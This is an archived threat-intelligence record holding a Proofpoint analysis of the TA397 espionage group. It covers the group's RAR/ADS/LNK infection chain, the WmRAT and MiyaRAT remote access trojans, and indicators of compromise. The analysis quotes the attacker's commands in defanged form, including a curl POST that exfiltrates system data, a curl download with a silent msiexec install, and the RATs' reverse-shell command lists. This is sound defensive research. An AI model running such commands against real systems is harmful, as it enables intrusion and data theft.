{ "id": "b30173a9-6ba8-4754-8890-4ccfc6efea8f", "created_at": "2026-04-06T00:09:45.156372Z", "updated_at": "2026-04-10T03:33:57.013145Z", "deleted_at": null, "sha1_hash": "2dd8df21de3d82903c0b789a398780aa8df6e1d1", "title": "Hidden in Plain Sight: TA397’s New Attack Chain Delivers Espionage RATs | Proofpoint US", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2329787, "plain_text": "Hidden in Plain Sight: TA397’s New Attack Chain Delivers Espionage\r\nRATs | Proofpoint US\r\nPublished: 2024-12-11 · Archived: 2026-04-02 11:20:17 UTC\r\nDecember 17, 2024 Nick Attfield, Konstantin Klinger, Pim Trouerbach, David Galazin and the Proofpoint Threat\r\nResearch Team\r\nKey findings \r\nProofpoint observed advanced persistent threat (APT) TA397 targeting a Turkish defense sector organization with\r\na lure about public infrastructure projects in Madagascar.  \r\nThe attack chain used alternate data streams in a RAR archive to deliver a shortcut (LNK) file that created a\r\nscheduled task on the target machine to pull down further payloads.  \r\nTA397 was observed manually delivering WmRAT and MiyaRAT malware families in the final stages of this\r\nattack chain. Both malware families are designed to enable intelligence gathering and exfiltration.  \r\nProofpoint assesses TA397 campaigns are almost certainly intelligence collection efforts in support of a South\r\nAsian government’s interests. \r\nOverview \r\nOn November 18, 2024, TA397 (also known by third-party researchers as Bitter) targeted a defense sector organization in\r\nTurkey with a spearphishing lure. The email included a compressed archive (RAR) file attachment containing a decoy\r\nPDF (~tmp.pdf) file detailing a World Bank public initiative in Madagascar for infrastructure development, a shortcut\r\n(LNK) file masquerading as a PDF (PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk), and an Alternate Data Stream\r\n(ADS) file that contained PowerShell code.  \r\nThe lure contained the subject “PUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCAR” which closely matched\r\nthe LNK file name masquerading as a PDF within the RAR archive: “PUBLIC INVESTMENTS PROJECTS\r\n2025.pdf.lnk”. This subject line theme is very common for TA397, as the majority of the organizations they target are\r\neither in the public sector or receive public investments and is indicative of the targeted nature of their campaigns.  \r\nThe usage of RAR archives is a staple tactic of TA397 payload delivery. Throughout the first half of 2024, Proofpoint has\r\nobserved TA397 utilizing Microsoft Compiled Help Files (CHM) files within RAR archives as a means of creating\r\nscheduled tasks on target machines.  \r\nThis blog post details TA397’s usage of NTFS alternate data streams (ADS) in combination with PDF and LNK files to\r\ngain persistence, which facilitates the deployment of further malware. This research also looks at the continued usage of\r\nwmRAT by TA397, the recently discovered MiyaRAT - a contemporary addition to the threat actor’s arsenal – and the\r\nassociated infrastructure of TA397.  \r\nInfection chain \r\nThe spearphishing email originated from a compromised email account belonging to a government organization and\r\ncontained a RAR archive with a variety of artifacts inside. Alongside the LNK file, was a “~tmp.pdf” file and two NTFS\r\nalternate data streams (ADS), one titled “Participation” and the other a “Zone.Identifier”.  \r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 1 of 14\n\nIllustration of the TA397 infection chain.  \r\nWhen opening the RAR file, the target would only see the LNK file as the ADS streams are hidden from the user when\r\nusing Windows’ built in RAR extraction utility, or WinRAR. Further, the PDF had the attribute Hidden, System \u0026 Files\r\nready for archiving (HSA) enabled so the user is lured to believe that a PDF file is being opened due to the extension\r\npdf.lnk. By default, Windows hides the real extension of a file. However, if the RAR is opened in 7-Zip, the user can view\r\nand extract the NTFS ADS streams on Windows systems (NTFS file formatted system): \r\n7-Zip view on 53a653aae9678075276bdb8ccf5eaff947f9121f73b8dcf24858c0447922d0b1.  \r\nADS streams are a feature of the NTFS file system in Windows that allows users to attach data streams to a file. There are\r\ncertain archive formats and software that allow ADS streams to be included into the archive container along with the file.\r\nThe archive format used in this attack chain is RAR v5 which allows the storage of NTFS ADS streams.  \r\nThe Zone.Identifier stream is an ADS introduced in older Windows versions as a security feature. It stores information\r\nabout the origin of a file, such as the URL Security Zone (e.g., Zone 3 for the internet) to determine if the file is\r\ntrustworthy. Files downloaded via browsers automatically receive this stream. Additionally, when files are extracted from\r\na downloaded archive using Windows Explorer, the extracted files inherit a Zone.Identifier stream with a ReferrerUrl\r\npointing to the original archive. A Zone.Identifier ADS is very common and is not required for the success of this attack\r\nchain, nevertheless it can provide useful information for forensic analysis.  \r\nThe Zone.Identifier ADS contains information about the origin of the “~tmp.pdf” file, and can be seen below: \r\nScreenshot of the PDF Zone.Identifier details.  \r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 2 of 14\n\nThe “~tmp.pdf” file is a legitimate PDF downloaded from the World Bank organization, detailing an infrastructure project\r\nabout paved roads in Madagascar. This can be seen in the following screenshot: \r\nLegitimate PDF used as a decoy document in the campaign. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 3 of 14\n\nThe second ADS is the “Participation” ADS. Inside the “Participation” stream was a base64 encoded PowerShell blob: \r\nBase64 encoded PowerShell from “Participation”.  \r\nThe LNK ran the following conhost command: \r\n --headless cmd /k \"cmd \u003c ~tmp.pdf:Participation \u0026 exit\"\r\nThis caused the ~tmp.pdf file to run the base64 encoded PowerShell contained within the “Participation” ADS stream\r\nwhich decoded to the following command: \r\nDecoded PowerShell command. \r\nThis PowerShell command opened the PDF lure file which displayed the World Bank decoy document to the user, and the\r\ncommand then set up a scheduled task named “DsSvcCleanup”. This scheduled task attempted to send target host\r\ninformation (username and computer name) with the curl utility every 17 minutes to the domain jacknwoods[.]com. This\r\nURI structure is used regularly by TA397. Upon successful retrieval of a payload, the downloaded file is launched with a\r\ncommand prompt. The task will continue to run even if a payload is dropped to the victim machine.\r\nThese requests were structured as follows:\r\nGET hxxp[:]//jacknwoods[.]com/jacds[.]php?jin=%computername%_%username%\r\nHost: jacknwoods[.]com\r\nUser-Agent: curl/7.55.1\r\nAccept: */*\r\nProofpoint observed TA397 operators respond to these requests with manual commands approximately 12 hours after the\r\nfirst scheduled task request, deploying two distinct payloads and a third command that enumerated the target machine and\r\nissues a POST request containing that information.  \r\nFirst, we observed this response from the attacker server:\r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 4 of 14\n\nFirst payload observed.  \r\nThis command downloads and runs the “anvrsa.msi” file on the target machine which installs the WmRAT file\r\n“anvrsa.exe”.  \r\n  TA397 issued further commands once they determined there was no successful communication from WmRAT. Shortly\r\nafter, Proofpoint observed TA397 issuing the following commands to enumerate the target machine:  \r\ncd C:\\programdata\r\ndir \u003e\u003e abc[.]pdf\r\ntasklist \u003e\u003e abc[.]pdf\r\nwmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get displayName \u003e\u003e abc[.]pdf\r\ncmd /c curl -X POST -F \"file=[@]C:\\programdata\\abc[.]pdf\"\r\nhxxps[:]//www[.]jacknwoods[.]com/chthuo[.]php?ain=%computername%_%username%\r\ndel abc[.]pdf\r\nThis series of commands shows TA397 enumerating the ProgramData directory, listing currently running processes, and\r\nusing the Windows command line utility (WMIC) to identify any antivirus products running on the target machine, and\r\nexfiltrating that data in a file to a different endpoint on the jacknwoods[.]com domain. A very similar set of commands\r\nwas previously observed and attributed to TA397 and published by StrikeReady Labs. \r\n  Following that, Proofpoint researchers observed TA397 dropping another payload by downloading and running\r\n“gfxview.msi”:  \r\ncurl -o C:\\users\\public\\music\\gfxview[.]msi\r\nhttp://jacknwoods[.]com/gfxview[.]msi\r\nmsiexec /i C:\\users\\public\\music\\gfxview.msi /qn /norestart\r\nThis acted as the dropper to install “xrgtg.exe” which was the MiyaRAT payload. WmRAT and MiyaRAT were first\r\nidentified by QiAnXin Threat Intelligence Center. Below is Proofpoint’s detailed analysis of WmRAT and MiyaRAT.  \r\nWmRAT \r\nWmRAT is a remote access trojan (RAT) written in C++ that uses sockets for communications and has standard RAT\r\nfunctionality. The RAT can gather basic host information, upload or download files, take screenshots, get geolocation data\r\nof the target machine, enumerate directories and files, and run arbitrary commands via cmd or PowerShell. The malware\r\nalso generates a number of junk threads, potentially to mislead researchers or responders investigating the samples. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 5 of 14\n\nThe malware starts by copying timezone information from calling GetDynamicTimeZoneInformation. Rather than any\r\nunique or interesting sleep techniques, this malware uses the classic method of directly calling Sleep. This is done\r\nthroughout the malware at various stages as well as having a dedicated function serving the purpose of just initiating a\r\nlong sleep.  \r\nThe sample then creates a thread which gathers some basic host information: \r\nUsername \r\nHostname \r\nThe list of logical drives for the host \r\nWhile this information is gathered, nothing is done with it and this process is repeated 1,000 times. Most likely this is just\r\nto fill up behavior logs or create copious amounts of noise within the environment.   \r\nMalware gathering basic disk information.  \r\nSoon after creating this thread, another thread is created that executes the same exact function gathering the same\r\ninformation.  \r\nWith the threads created, the malware begins attempts to communicate with the C2. In the samples observed by\r\nProofpoint at this stage a socket has not been initialized yet, so these specific communications fail. Although later in the\r\nexecution the socket is initialized properly, so it will indeed be able to communicate with the C2 after that point.  The\r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 6 of 14\n\nmalware decrypts the C2 server address academymusica[.]com by taking each character from an encrypted blob and\r\nsubtracting 0x25 from it.  \r\nDecrpytion of server address academymusica[.]com.\r\nThis subtraction cipher is how all string decryption is done for the malware. Each character has a set value added or\r\nsubtracted from it, resulting in the expected output. Generally when malware sends command identifiers or data\r\nidentifiers to the C2, its done in plaintext or is some numeric value. But in the case of this malware, it sends seemingly\r\nrandom values as identifiers. Like the “*****” below.  \r\nCleartext string of asterisks.  \r\nAssuming all the junk threads have started, the malware does a connectivity check by making a request to\r\nmicrosoft[.]com. After this, the socket is finally initialized to connect to the C2 decrypted earlier in the program. This is\r\nset to communicate with a hardcoded port, which in this sample is set to 47408. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 7 of 14\n\nHardcoded port initialization.  \r\nThe socket receives a 4-byte value from the C2, swapping the endianness, and passing that to the command handler which\r\nindicates the ordinal value of the command to execute.  \r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 8 of 14\n\nInvocation of the command handler, after socket initialization.\r\nAs far as supported commands, these are some of the most notable ones: \r\n8: read and exfil file \r\n9: create host summary  \r\n12: exit infection \r\n13: receive data from the C2, and write to file stream \r\n15: receive and decrypt filepath from C2,  \r\n19: take screenshot and exfil \r\n21: get geolocation information \r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 9 of 14\n\n22: get file listing from given directory and gather file create/modification time \r\n24: get disk size for files and directories \r\n26: mini command handler \r\n27: exec string in cmd or powershell, or restart self \r\n31: exit \r\nMiyaRAT \r\nMiyaRAT is also written in C++ and contains similar functionality to WmRAT. The malware starts by decrypting its\r\nhardcoded C2 server. This domain is decoded by taking the encoded value and subtracting the matching character in the\r\nstring “doobiedoodooziezzz” from it.  \r\nDecoding C2 server samsnewlooker[.]com.  \r\nDoing this results in the C2 domain samsnewlooker[.]com. Along with this, the sample has as hardcoded port value set as\r\na string which determines which port the implant connects to. Strangely the malware then runs its own implementation of\r\nMersenne twister, which is a common random number generator implementation, which is used to generate values to\r\nsleep for a designated period of time.  \r\nWith the C2 decoded, a global socket is then created with the hardcoded port of 56189.  \r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 10 of 14\n\nSocket creation with hardcoded port 56189.  \r\nAfter the socket is initialized, MiyaRAT gathers basic system information which is sent in the first communication to the\r\nC2.  \r\nBasic information gathered to send to the threat actor.  \r\nOne of the final fields sent within the initial communication is the version of the malware, in this case being 3.  \r\nMalware version information.  \r\nThis data is then encrypted by XORing each byte of the data with 0x43. An example of the entire set of data sent to the\r\nC2 can be seen below.  \r\n``` \r\nC:\\--3  [106.07/238.47] GB FREE \r\n|\u003cusername\u003e|\u003chostname\u003e|C:\\Windows\\cnstaller\\MScCA69.tmp|C:\\Users\\\u003cuser\u003e|10.0 125 19044|3.0| \r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 11 of 14\n\n``` \r\nThe C2 can respond commands that MiyaRAT supports: \r\nGDIR – get directory tree \r\nDELz – remove directory/file \r\nGFS – enumerate all files from a specific directory \r\nSH1start_cmd – reverse shell using CMD \r\nSH1start_ps – reverse shell using PowerShell \r\nSH1 – interact with reverse shell \r\nSFS – connect to new socket to upload and download files via UPL/DWNL \r\nGSS – take screenshot and exfil  \r\nSH1exit_client – close infection \r\nSH2 - interact with reverse shell \r\nNetwork analysis \r\nTA397’s infrastructure usage throughout this campaign is divided between the implant domains and the staging domains.\r\nThe jacknwoods[.]com domain acted as their staging domain to distribute WmRAT and MiyaRAT, and\r\nacademymusica[.]com and samsnewlooker[.]com as C2 domains for each implant.  \r\nThe staging domain jacknwoods[.]com resolved to 185.244.151[.]84, registered with a Let’s Encrypt certificate with\r\nGoDaddy as a provider. Proofpoint has observed this combination of domain registration patterns in several previous\r\nTA397 campaigns when deploying staging infrastructure. The IP is multi-tenanted, and not controlled by TA397.  \r\nThe WmRAT C2 academymusica[.]com resolved to 38.180.142[.]228 at the time of analysis, while theMiyaRAT C2 \r\nsamsnewlooker[.]comresolved to 96.9.215[.]155. Proofpoint assesses it is likely these two IPs are attacker-owned\r\ninfrastructure.   \r\nAttribution \r\nWhilst this blog has revealed an interesting evolution of TTPs in TA397’s capability set; this activity still demonstrates\r\nsignature markers of behavior Proofpoint have observed from TA397 historically: \r\nThe usage of RAR archives to deliver a payload that creates a scheduled task on target machines, with a command\r\nline structure that seldom changes.  \r\nThe infrastructure and hosting providers in use bears similarities to historical TA397 infrastructure.  \r\nTargeting organizations in the defense sector in the EMEA and APAC regions. \r\nAcross observed campaigns, activity consistently falls within the working hours of UTC+5:30. Proofpoint has\r\nobserved the manual deployment of TA397 malware multiple times across different campaigns that align with the\r\nworking hours of this timezone.  \r\nBoth RATs analyzed in this blog have been historically attributed to TA397 (wmRAT and MiyaRAT respectively),\r\nand Proofpoint concurs with this assessment.  \r\nProofpoint assesses WmRAT and MiyaRAT are two distinct malware families in active, operational use by TA397. We\r\nbelieve it is a realistic possibility that both families were written by the same developer(s). It is also clear that MiyaRAT is\r\nthe newer of the two tools in their arsenal. Proofpoint assesses MiyaRAT may be reserved for targets TA397 deems high\r\nvalue due to the observed sporadic deployment of the malware in only a certain number of campaigns.  \r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 12 of 14\n\nBased on Proofpoint's analysis of the characteristics of the observed campaign, previously observed lure content,\r\nhistorical targeting, time-based analysis of TA397 campaigns, and a review of industry reporting on activity associated to\r\nBitter, Proofpoint researchers assess these campaigns are almost certainly intelligence collection efforts in support of a\r\nSouth Asian government’s interests.  \r\nWhy it matters \r\nTA397 is a prominent South-Asian nexus, espionage-focused APT that frequently and consistently targets government,\r\nenergy, telecommunications, defense and engineering organizations throughout the EMEA and APAC regions. They\r\npersistently utilize scheduled tasks to communicate with their staging domains to deploy malicious backdoors into target\r\norganizations, for the purpose of gaining access to privileged information and intellectual property.  \r\n  This blog provides defenders with the knowledge and tools necessary to identify and defend against intrusions from\r\nTA397. \r\nYARA / ET sigs \r\nYARA signature available here. \r\n2058192 - ET MALWARE TA397/Bitter Requesting Next Stage Payload\r\nIOCs \r\nIndicator  Type \r\nFirst\r\nObserved \r\nDescription \r\n53a653aae9678075276bdb8ccf5eaff947f9121f73b8dcf24858c0447922d0b1  SHA256 \r\n2024-11-\r\n18 \r\nRAR \r\nf6c77098906f5634789d7fd7ff294bfd95325d69f1be96be1ee49ff161e07733  SHA256 \r\n2024-11-\r\n18 \r\nLNK \r\n10cec5a84943f9b0c635640fad93fd2a2469cc46aae5e43a4604c903d139970f   SHA256 \r\n2024-09-\r\n23 \r\nwmRAT  \r\nc7ab300df27ad41f8d9e52e2d732f95479f4212a3c3d62dbf0511b37b3e81317  SHA256 \r\n2024-10-\r\n12 \r\nMiyaRAT  \r\nacademymusica[.]com  Domain \r\n2024-11-\r\n06 \r\nC2 \r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 13 of 14\n\nsamsnewlooker[.]com  Domain \r\n2024-09-\r\n25 \r\nC2 \r\njacknwoods[.]com   Domain  \r\n2024-11-\r\n07 \r\nStaging\r\nDomain \r\n38.180.142[.]228  IP \r\n2024-11-\r\n06 \r\nC2 \r\n96.9.215[.]155  IP \r\n2024-09-\r\n25 \r\nC2 \r\nSource: https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MISPGALAXY" ], "references": [ "https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats" ], "report_names": [ "hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats" ], "threat_actors": [ { "id": "655f7d0b-7ea6-4950-b272-969ab7c27a4b", "created_at": "2022-10-27T08:27:13.133291Z", "updated_at": "2026-04-10T02:00:05.315213Z", "deleted_at": null, "main_name": "BITTER", "aliases": [ "T-APT-17" ], "source_name": "MITRE:BITTER", "tools": [ "ZxxZ" ], "source_id": "MITRE", "reports": null }, { "id": "acd789fa-d488-47f3-b9cc-fdb18b1fa375", "created_at": "2023-01-06T13:46:39.332092Z", "updated_at": "2026-04-10T02:00:03.290017Z", "deleted_at": null, "main_name": "HAZY TIGER", "aliases": [ "T-APT-17", "APT-C-08", "Orange Yali", "TA397" ], "source_name": "MISPGALAXY:HAZY TIGER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bf6cb670-bb69-473f-a220-97ac713fd081", "created_at": "2022-10-25T16:07:23.395205Z", "updated_at": "2026-04-10T02:00:04.578924Z", "deleted_at": null, "main_name": "Bitter", "aliases": [ "G1002", "T-APT-17", "TA397" ], "source_name": "ETDA:Bitter", "tools": [ "Artra Downloader", "ArtraDownloader", "Bitter RAT", "BitterRAT", "Dracarys" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434185, "ts_updated_at": 1775792037, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2dd8df21de3d82903c0b789a398780aa8df6e1d1.pdf", "text": "https://archive.orkl.eu/2dd8df21de3d82903c0b789a398780aa8df6e1d1.txt", "img": "https://archive.orkl.eu/2dd8df21de3d82903c0b789a398780aa8df6e1d1.jpg" } }